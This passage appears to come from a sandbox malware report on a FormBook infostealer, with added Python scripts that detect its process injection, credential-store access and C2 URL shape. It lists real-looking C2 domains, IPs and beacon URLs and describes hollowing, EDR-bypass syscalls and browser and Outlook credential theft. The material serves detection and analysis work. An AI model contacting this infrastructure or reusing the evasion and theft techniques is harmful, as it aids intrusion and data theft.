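        src, event, detail = base(m["src"]), m["event"].strip(), m["detail"]
        if SYSCALL_RE.match(event) and detail.startswith("Direct from:"):
            direct_syscalls[src].add(event)
        elif event == "Section loaded":
            s = SECTION_RE.search(detail)
            if s and "execute" in s["prot"] and "write" in s["prot"]:   # RWX mapping only
                rwx_sections.append((src, base(s["target"])))
        elif event in ("Thread register set", "Thread APC queued"):
            thread_hijacks.append((src, detail.split("target process:", 1)[-1].strip()))
        elif event == "Process created":
            p = PROC_RE.match(detail)
            if not p:
                continue
            child, cmd_exe = base(p["image"]), base(p["cmd"])
            process_tree.append((src, child))
            if cmd_exe != child:   # svchost.exe carrying the dropper's command line
                flags.append(f"{child} runs with the command line of {cmd_exe}: "
                             "image/command-line mismatch, consistent with process hollowing")
            elif child in LOLBINS and p["cmd"].strip().lower() == p["image"].strip().lower():
                flags.append(f"{src} started {child} with no arguments")
            if src in LOLBINS and child in BROWSERS:
                flags.append(f"{src} launched the browser {child}: target for form-grabber injection")
        elif event == "File opened" and base(detail) in CRED_FILES:
            cred_hits.append((src, detail))
        elif event == "Key opened" and OUTLOOK_PROFILES in detail.lower():
            cred_hits.append((src, detail))
        elif event == "Binary or memory string" and any(k in detail for k in AUTOIT_MARKERS):
            autoit = True
    for injector, target in rwx_sections:
        flags.append(f"{injector} mapped an RWX section into {target}")
    for proc, calls in direct_syscalls.items():
        if {"NtAllocateVirtualMemory", "NtProtectVirtualMemory"} <= calls:
            flags.append(f"{proc} issues direct syscalls for memory allocation/protection "
                         "change (EDR user-mode hook bypass)")
    if cred_hits:
        flags.append(f"{len(cred_hits)} credential-store accesses (browser Login Data/Cookies, Outlook profiles)")
    if autoit:
        flags.append("compiled AutoIt script markers present in the sample")
    return {"direct_syscalls": dict(direct_syscalls), "rwx_sections": rwx_sections,
            "thread_hijacks": thread_hijacks, "process_tree": process_tree,
            "credential_access": cred_hits, "autoit": autoit, "flags": flags}


if __name__ == "__main__":
    for line in triage(SAMPLE_LINES)["flags"]:
        print("-", line)
```

The "Section loaded" filter keeps only mappings that are both executable and writable, so the read-write mapping into firefox.exe that precedes the RWX one is not counted twice; the image/command-line comparison is the cheapest hollowing check available from this kind of log, since the child (svchost.exe) here carries the dropper's own path as its command line.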

            Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.3713805727.0000000005200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1543869088.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3705034612.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1543109899.0000000000660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3713859842.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1542537853.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3713610097.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3716040439.0000000004F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_00706596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00706596
Source: C:\Users\user\Desktop\Documente de expediere.exe | Code function: 0_2_00706A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00706A5A
MITRE ATT&CK Matrix (listed per tactic; a leading number is the report's signature-count badge for that technique, kept as extracted; techniques without a number did not match)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph (ID: 1477464; Sample: Documente de expediere.exe; Start date: 21/07/2024; Architecture: WINDOWS; Score: 100)

Sample level: contacts www.shiybalinks.com, www.sehraji.com and 22 other IPs or domains. Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected FormBook; 6 other signatures.

Process tree (the per-node counts 4 and 13 from the graph dump are kept as extracted):
Documente de expediere.exe (started; 4)
  Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
  -> svchost.exe (started)
     Signatures: Maps a DLL or memory area into another process
     -> QAWHbhvedb.exe (injected)
        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        -> certutil.exe (started; 13)
           Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
           -> QAWHbhvedb.exe (injected)
              Network: www.fardehb.top 203.161.41.207, ports 49726, 49727, 49728 (VNPT-AS-VN VNPT Corp VN, Malaysia); karak-networks.online 84.32.84.32, ports 49730, 49731, 49732 (NTT-LT-AS LT, Lithuania); 7 other IPs or domains
              Signatures: Found direct / indirect Syscall (likely to bypass EDR)
           -> firefox.exe (started)

Source | Detection | Scanner | Label
Documente de expediere.exe | 74% | ReversingLabs | Win32.Backdoor.FormBook
Documente de expediere.exe | 50% | Virustotal
Documente de expediere.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner
www.evoolihubs.shop | 0% | Virustotal
funnelkakes.com | 0% | Virustotal
www.jleabres.com | 2% | Virustotal
karak-networks.online | 0% | Virustotal
www.funnelkakes.com | 0% | Virustotal
www.marktuana.com | 0% | Virustotal
Source | Detection | Scanner | Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP | 0% | Avira URL Cloud | safe
http://www.sehraji.com/rjez/ | 0% | Avira URL Cloud | safe
http://www.jleabres.com/w977/?5HE=Azoptr76oomZ4omVga/Zpvzn3e5/jEQILAaug91rkSWZLV4kzjGPp1+9B2L+PrxFmPSw5JOBqYEy7G3QmPMO+i+kevqWQBtSr1hLWjIV+6WjfyA1QEzp+Ir7n0GaYPvcmgAl6gWaxTBt&UXR=kTP8XfI8 | 0% | Avira URL Cloud | safe
http://www.fardehb.top/or4s/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
http://www.karak-networks.online/2afv/?5HE=hLY9GbFjrTr/Z7Z1J1n+8mxvovTjHVjaQ1TETPlxVVMVYtq2nLqFQ+qvrj4cFtmldoUiHIajNLHyMvL4kY+KeK3n/v9QeqmigNuoWlpmTNFJx52laQwxR7zETdE9Da/cctIuDpSkBIav&UXR=kTP8XfI8 | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Virustotal
https://duckduckgo.com/ac/?q= | 0% | Virustotal
http://www.ecoaxion.com/m8jb/ | 0% | Avira URL Cloud | safe
http://www.fardehb.top/or4s/?5HE=UOVTILZNORwRjwgBkAdUsPPg2JHxvT7McsE496DqNpR2tR/wGus0wQl5jLS0JR4P7qKOiEjtUO6PhFxn6GFMV2L3p99CK/w4pk8/xjMAjlx+vsYxSa6ADJMuQ/dVnyYbrtzDu6vYzAhS&UXR=kTP8XfI8 | 0% | Avira URL Cloud | safe
http://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN+QA3R40qpI1p3EHt4xIxf5IDvSUmLm24xdAndElLjryJNFC6VX5rU/4u1ZoNU71gjUwgGDzFCy1dhdBzksntmTnqyiroVCcmEoAnVJrC&UXR=kTP8XfI8 | 0% | Avira URL Cloud | safe
http://www.nationsincbook.com/ka5q/ | 0% | Avira URL Cloud | safe
http://www.809934.com/vqsg/ | 0% | Avira URL Cloud | safe
http://www.karak-networks.online/2afv/ | 0% | Avira URL Cloud | safe
https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c | 0% | Avira URL Cloud | safe
http://www.shiybalinks.com/knjl/ | 0% | Avira URL Cloud | safe
http://www.betano627.com/5jc8/ | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://www.shiybalinks.com/knjl/ | 0% | Virustotal
http://www.italyuntold.com/5yb0/?5HE=6Dg8z4KG4YPExlQ9XMiCDUjuBaAtCe8c6s2BJ4Cptukw6Fp783jCo9a8aBIuYHvq1uoCHxO9BKTCqzYY5Vc8A4FzhFFqSFNP5lWxTqvoYXkdyieyJBVlwNBJ3PLm6lrF0y9xthhOWCBy&UXR=kTP8XfI8 | 0% | Avira URL Cloud | safe
http://www.gtprivatewealth.com/c4g1/ | 0% | Avira URL Cloud | safe
http://www.funnelkakes.com/sgjw/?5HE=KIlhclE33g4p4bCYeWfzGem6xaRipp25IwoHZsonIzqxF8P3vwkjyQxG0+k1uafiZ5V1+a0hVzemZgjWOIKcqi50j1ligTTnKiK+69bNO3Q0fQNjMb89nuUv03Pn1kYgjPKVAy4urBGQ&UXR=kTP8XfI8 | 0% | Avira URL Cloud | safe
https://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN | 0% | Avira URL Cloud | safe
https://www.fastmail.help/hc/en-us/articles/1500000280141 | 0% | Avira URL Cloud | safe
http://www.809934.com/vqsg/?5HE=oEbg7hQU3MdCAI1Qzg6FnUbuYrpcD6PCFR/op5n6toe9jhHpPI7gLsdW3wxEsJ1FGff0/+qDBwgK/n9QPqrWSnFVgwucvZm42LyzbELDPU/Ii2JDfpNRbGk3upTzOCY2A4WqGnxtTcSM&UXR=kTP8XfI8 | 0% | Avira URL Cloud | safe
https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c | 0% | Virustotal
http://www.betano627.com/5jc8/?5HE=SGmAsJs22AX1ghH/bJyjJOhI3u1qaDFYGxKt82Fw19pLlHDYBaMekb65pyujOkSYs7LYFrx9Bf/HP6/nbBjkeU53huHOszAAxfxDrGe5Zlk4W5YDgBaJ8zAbn1c/SvwA0vRZEPbSBJgr&UXR=kTP8XfI8 | 0% | Avira URL Cloud | safe
http://www.jleabres.com/w977/ | 0% | Avira URL Cloud | safe
http://www.nationsincbook.com/ka5q/?5HE=sbHYTBVMO+ZN3cimlSddhWyxOd9+ryqDwURfGp0ztBsxBU1bfXTxhmHIz6dWKnPi5VSox+9kY/vve8cZkTHpuVybjDJHaA/MeMU7Z/Kl4srSdSD7kaL79EM6BOjJOd/XEoe9QrfXL9O6&UXR=kTP8XfI8 | 0% | Avira URL Cloud | safe
https://www.fastmailusercontent.com/filestorage/css/main.css | 0% | Avira URL Cloud | safe
http://www.olhadeputat.com/xm40/ | 0% | Avira URL Cloud | safe
http://www.karak-networks.online | 0% | Avira URL Cloud | safe
http://www.olhadeputat.com/xm40/?5HE=daAh1PvHixV61uAQZMYKPaNePBcxkEwbh0Ym6iIWO855OlL+0fA+LsjnAgtj7WyOZoCeoLSk25i6sMGFDrtEZ/sdfpdR1CdNhpbdr9VgkorBlDalMPv+Xn4VuwyhQF+VdIAPT792X8nN&UXR=kTP8XfI8 | 0% | Avira URL Cloud | safe
http://www.evoolihubs.shop/bked/ | 0% | Avira URL Cloud | safe
http://www.funnelkakes.com/sgjw/ | 0% | Avira URL Cloud | safe
http://www.ecoaxion.com/m8jb/?5HE=9yAQtAPv7VajbMozC95KjxHcDgZBNAloOjx9xoxEZfGfjxdjUWGlbu7OvwZLKHzd+pQOJ7zTb4VBUF6T+jZVGdwVGTofMGVOhhQduo/gOWAVXXfufsk0uisH+JnvVli93h1SVJOpBT3C&UXR=kTP8XfI8 | 0% | Avira URL Cloud | safe
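Every C2 URL in the table above has the same shape: a four-character directory (/w977/, /2afv/, /bked/ ...), one parameter with a short name (5HE) carrying a long base64-like blob, and a second short parameter (UXR) whose value kTP8XfI8 is identical across all thirteen hosts, with the bare directory URL appearing alongside. The URL reputation scanners rate all of them "safe", so the shape itself is the useful detection. The script below is an added example, not part of this report or of Joe Sandbox: it classifies URLs by that shape and groups beacons by their constant parameter to tie the rotating hosts to one campaign. The URL list is constructed from the report's tables plus three benign browser URLs that also appear there; the length thresholds and the use of the constant token as a campaign key are the author's assumptions, as is the choice to count a bare directory URL only when its host also sent a full beacon.

```python
"""Shape detector for the FormBook-style C2 URLs in this report's URL tables.

Added example; not part of this report or of Joe Sandbox.  The URL shape is
read off the report's own URLs; the length thresholds and the use of the
constant second parameter as a campaign key are the author's assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")         # e.g. /w977/, /2afv/, /rjez/
KEY_RE = re.compile(r"^[A-Za-z0-9]{2,4}$")       # e.g. 5HE, UXR
BLOB_RE = re.compile(r"^[A-Za-z0-9+/=]{64,}$")   # long base64-like check-in data
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{4,16}$")    # e.g. kTP8XfI8, constant across hosts

# Constructed from the report's URL tables (beacons, bare paths, one beacon that
# the report truncates) plus three benign browser URLs that the report also lists.
SAMPLE_URLS = [
    "http://www.jleabres.com/w977/?5HE=Azoptr76oomZ4omVga/Zpvzn3e5/jEQILAaug91rkSWZLV4kzjGPp1+9B2L+PrxFmPSw5JOBqYEy7G3QmPMO+i+kevqWQBtSr1hLWjIV+6WjfyA1QEzp+Ir7n0GaYPvcmgAl6gWaxTBt&UXR=kTP8XfI8",
    "http://www.karak-networks.online/2afv/?5HE=hLY9GbFjrTr/Z7Z1J1n+8mxvovTjHVjaQ1TETPlxVVMVYtq2nLqFQ+qvrj4cFtmldoUiHIajNLHyMvL4kY+KeK3n/v9QeqmigNuoWlpmTNFJx52laQwxR7zETdE9Da/cctIuDpSkBIav&UXR=kTP8XfI8",
    "http://www.fardehb.top/or4s/?5HE=UOVTILZNORwRjwgBkAdUsPPg2JHxvT7McsE496DqNpR2tR/wGus0wQl5jLS0JR4P7qKOiEjtUO6PhFxn6GFMV2L3p99CK/w4pk8/xjMAjlx+vsYxSa6ADJMuQ/dVnyYbrtzDu6vYzAhS&UXR=kTP8XfI8",
    "http://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN+QA3R40qpI1p3EHt4xIxf5IDvSUmLm24xdAndElLjryJNFC6VX5rU/4u1ZoNU71gjUwgGDzFCy1dhdBzksntmTnqyiroVCcmEoAnVJrC&UXR=kTP8XfI8",
    "http://www.fardehb.top/or4s/",
    "http://www.sehraji.com/rjez/",
    "http://www.shiybalinks.com/knjl/",
    "https://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN",
    "https://duckduckgo.com/ac/?q=",
    "https://www.ecosia.org/newtab/",
    "https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=",
]


def split_query(query):
    """Split k=v pairs by hand: urllib.parse.parse_qs would turn the '+' inside
    the base64-like blob into a space and the blob would no longer match."""
    return [tuple(p.split("=", 1)) for p in query.split("&") if "=" in p]


def classify(url):
    """Return {"kind": "beacon"|"base", ...} for a FormBook-shaped URL, else None."""
    u = urlsplit(url)
    if u.scheme not in ("http", "https") or not PATH_RE.match(u.path):
        return None
    host = u.hostname or ""
    if not u.query:                      # bare directory: the POST target of a host
        return {"kind": "base", "host": host, "path": u.path}
    pairs = split_query(u.query)
    if len(pairs) != 2:                  # the truncated report URL lands here
        return None
    (k1, blob), (k2, token) = pairs
    if not (KEY_RE.match(k1) and KEY_RE.match(k2) and BLOB_RE.match(blob) and TOKEN_RE.match(token)):
        return None
    return {"kind": "beacon", "host": host, "path": u.path, "keys": (k1, k2), "token": token}


def cluster(urls):
    """Group beacon hosts by (key1, key2, token).  The sample rotates through many
    decoy and real C2 hosts; parameter names and token stay fixed per build, so
    one group is one campaign (assumption, consistent with this report)."""
    groups = defaultdict(set)
    for url in urls:
        rec = classify(url)
        if rec and rec["kind"] == "beacon":
            groups[rec["keys"] + (rec["token"],)].add(rec["host"])
    return {k: sorted(v) for k, v in groups.items()}


def corroborated_bare_paths(urls):
    """A bare /xxxx/ URL is weak evidence alone (any site may have such a path);
    keep only those whose host also sent a full beacon."""
    beacon_hosts = {r["host"] for r in map(classify, urls) if r and r["kind"] == "beacon"}
    return sorted(u for u in urls if (r := classify(u)) and r["kind"] == "base" and r["host"] in beacon_hosts)


if __name__ == "__main__":
    for key, hosts in cluster(SAMPLE_URLS).items():
        print(key, "->", ", ".join(hosts))
    print("corroborated bare paths:", corroborated_bare_paths(SAMPLE_URLS))
```

The parameter names and the token are per-build values, so a rule written from this report would be narrowed to 5HE/UXR/kTP8XfI8 for hunting this campaign and left generic (short keys, long blob, short token) for broader coverage.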
Name | IP | Active | Malicious | Reputation (the Antivirus Detection column is empty for every entry)
shiybalinks.com | 3.33.130.190 | true | false | unknown
www.evoolihubs.shop | 188.114.96.3 | true | false | unknown
betano627.com | 3.33.130.190 | true | false | unknown
italyuntold.com | 3.33.130.190 | true | false | unknown
gtprivatewealth.com | 3.33.130.190 | true | false | unknown
nationsincbook.com | 3.33.130.190 | true | false | unknown
funnelkakes.com | 76.223.67.189 | true | false | unknown
www.ecoaxion.com | 13.248.169.48 | true | false | unknown
www.olhadeputat.com | 188.114.97.3 | true | false | unknown
www.809934.com | 148.135.97.125 | true | false | unknown
sehraji.com | 84.32.84.32 | true | false | unknown
www.fardehb.top | 203.161.41.207 | true | false | unknown
www.jleabres.com | 103.168.172.37 | true | false | unknown
karak-networks.online | 84.32.84.32 | true | false | unknown
www.nationsincbook.com | unknown | unknown | true | unknown
www.marktuana.com | unknown | unknown | true | unknown
www.shiybalinks.com | unknown | unknown | true | unknown
www.karak-networks.online | unknown | unknown | true | unknown
www.sehraji.com | unknown | unknown | true | unknown
www.funnelkakes.com | unknown | unknown | true | unknown
www.gtprivatewealth.com | unknown | unknown | true | unknown
www.betano627.com | unknown | unknown | true | unknown
www.italyuntold.com | unknown | unknown | true | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.jleabres.com/w977/?5HE=Azoptr76oomZ4omVga/Zpvzn3e5/jEQILAaug91rkSWZLV4kzjGPp1+9B2L+PrxFmPSw5JOBqYEy7G3QmPMO+i+kevqWQBtSr1hLWjIV+6WjfyA1QEzp+Ir7n0GaYPvcmgAl6gWaxTBt&UXR=kTP8XfI8 | false | Avira URL Cloud: safe | unknown
http://www.fardehb.top/or4s/ | false | Avira URL Cloud: safe | unknown
http://www.sehraji.com/rjez/ | false | Avira URL Cloud: safe | unknown
http://www.karak-networks.online/2afv/?5HE=hLY9GbFjrTr/Z7Z1J1n+8mxvovTjHVjaQ1TETPlxVVMVYtq2nLqFQ+qvrj4cFtmldoUiHIajNLHyMvL4kY+KeK3n/v9QeqmigNuoWlpmTNFJx52laQwxR7zETdE9Da/cctIuDpSkBIav&UXR=kTP8XfI8 | false | Avira URL Cloud: safe | unknown
http://www.ecoaxion.com/m8jb/ | false | Avira URL Cloud: safe | unknown
http://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN+QA3R40qpI1p3EHt4xIxf5IDvSUmLm24xdAndElLjryJNFC6VX5rU/4u1ZoNU71gjUwgGDzFCy1dhdBzksntmTnqyiroVCcmEoAnVJrC&UXR=kTP8XfI8 | false | Avira URL Cloud: safe | unknown
http://www.fardehb.top/or4s/?5HE=UOVTILZNORwRjwgBkAdUsPPg2JHxvT7McsE496DqNpR2tR/wGus0wQl5jLS0JR4P7qKOiEjtUO6PhFxn6GFMV2L3p99CK/w4pk8/xjMAjlx+vsYxSa6ADJMuQ/dVnyYbrtzDu6vYzAhS&UXR=kTP8XfI8 | false | Avira URL Cloud: safe | unknown
http://www.nationsincbook.com/ka5q/ | false | Avira URL Cloud: safe | unknown
http://www.809934.com/vqsg/ | false | Avira URL Cloud: safe | unknown
http://www.karak-networks.online/2afv/ | false | Avira URL Cloud: safe | unknown
http://www.shiybalinks.com/knjl/ | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
http://www.betano627.com/5jc8/ | false | Avira URL Cloud: safe | unknown
http://www.italyuntold.com/5yb0/?5HE=6Dg8z4KG4YPExlQ9XMiCDUjuBaAtCe8c6s2BJ4Cptukw6Fp783jCo9a8aBIuYHvq1uoCHxO9BKTCqzYY5Vc8A4FzhFFqSFNP5lWxTqvoYXkdyieyJBVlwNBJ3PLm6lrF0y9xthhOWCBy&UXR=kTP8XfI8 | false | Avira URL Cloud: safe | unknown
http://www.funnelkakes.com/sgjw/?5HE=KIlhclE33g4p4bCYeWfzGem6xaRipp25IwoHZsonIzqxF8P3vwkjyQxG0+k1uafiZ5V1+a0hVzemZgjWOIKcqi50j1ligTTnKiK+69bNO3Q0fQNjMb89nuUv03Pn1kYgjPKVAy4urBGQ&UXR=kTP8XfI8 | false | Avira URL Cloud: safe | unknown
http://www.gtprivatewealth.com/c4g1/ | false | Avira URL Cloud: safe | unknown
http://www.betano627.com/5jc8/?5HE=SGmAsJs22AX1ghH/bJyjJOhI3u1qaDFYGxKt82Fw19pLlHDYBaMekb65pyujOkSYs7LYFrx9Bf/HP6/nbBjkeU53huHOszAAxfxDrGe5Zlk4W5YDgBaJ8zAbn1c/SvwA0vRZEPbSBJgr&UXR=kTP8XfI8 | false | Avira URL Cloud: safe | unknown
http://www.809934.com/vqsg/?5HE=oEbg7hQU3MdCAI1Qzg6FnUbuYrpcD6PCFR/op5n6toe9jhHpPI7gLsdW3wxEsJ1FGff0/+qDBwgK/n9QPqrWSnFVgwucvZm42LyzbELDPU/Ii2JDfpNRbGk3upTzOCY2A4WqGnxtTcSM&UXR=kTP8XfI8 | false | Avira URL Cloud: safe | unknown
http://www.jleabres.com/w977/ | false | Avira URL Cloud: safe | unknown
http://www.nationsincbook.com/ka5q/?5HE=sbHYTBVMO+ZN3cimlSddhWyxOd9+ryqDwURfGp0ztBsxBU1bfXTxhmHIz6dWKnPi5VSox+9kY/vve8cZkTHpuVybjDJHaA/MeMU7Z/Kl4srSdSD7kaL79EM6BOjJOd/XEoe9QrfXL9O6&UXR=kTP8XfI8 | false
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.olhadeputat.com/xm40/false
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.olhadeputat.com/xm40/?5HE=daAh1PvHixV61uAQZMYKPaNePBcxkEwbh0Ym6iIWO855OlL+0fA+LsjnAgtj7WyOZoCeoLSk25i6sMGFDrtEZ/sdfpdR1CdNhpbdr9VgkorBlDalMPv+Xn4VuwyhQF+VdIAPT792X8nN&UXR=kTP8XfI8false
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.evoolihubs.shop/bked/false
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.funnelkakes.com/sgjw/false
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.ecoaxion.com/m8jb/?5HE=9yAQtAPv7VajbMozC95KjxHcDgZBNAloOjx9xoxEZfGfjxdjUWGlbu7OvwZLKHzd+pQOJ7zTb4VBUF6T+jZVGdwVGTofMGVOhhQduo/gOWAVXXfufsk0uisH+JnvVli93h1SVJOpBT3C&UXR=kTP8XfI8false
                                              • Avira URL Cloud: safe
                                              unknown
Name / Source / Malicious / Antivirus Detection / Reputation
https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
  Source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp; QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp; QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: unknown
https://duckduckgo.com/chrome_newtab
  Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • 0%, Virustotal
  • Avira URL Cloud: safe
  Reputation: unknown
https://duckduckgo.com/ac/?q=
  Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • 0%, Virustotal
  • Avira URL Cloud: safe
  Reputation: unknown
https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c
  Source: svchost.exe, 00000002.00000003.1503083628.0000000004E00000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000002.00000003.1508047738.0000000005000000.00000004.00000020.00020000.00000000.sdmp; QAWHbhvedb.exe, 0000000D.00000003.1477789861.00000000031C8000.00000004.00000001.00020000.00000000.sdmp; QAWHbhvedb.exe, 0000000D.00000003.1479317286.0000000003315000.00000004.00000001.00020000.00000000.sdmp
  Malicious: false
  • 0%, Virustotal
  • Avira URL Cloud: safe
  Reputation: unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
  Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
  Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • URL Reputation: safe
  Reputation: unknown
https://www.ecosia.org/newtab/
  Source: certutil.exe, 0000000E.00000002.3717204087.00000000086EB000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  • URL Reputation: safe
  Reputation: unknown
https://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN
  Source: certutil.exe, 0000000E.00000002.3715079219.0000000006960000.00000004.10000000.00040000.00000000.sdmp; QAWHbhvedb.exe, 0000000F.00000002.3714172615.0000000003890000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false
  • Avira URL Cloud: safe
  Reputation: unknown
https://www.fastmail.help/hc/en-us/articles/1500000280141
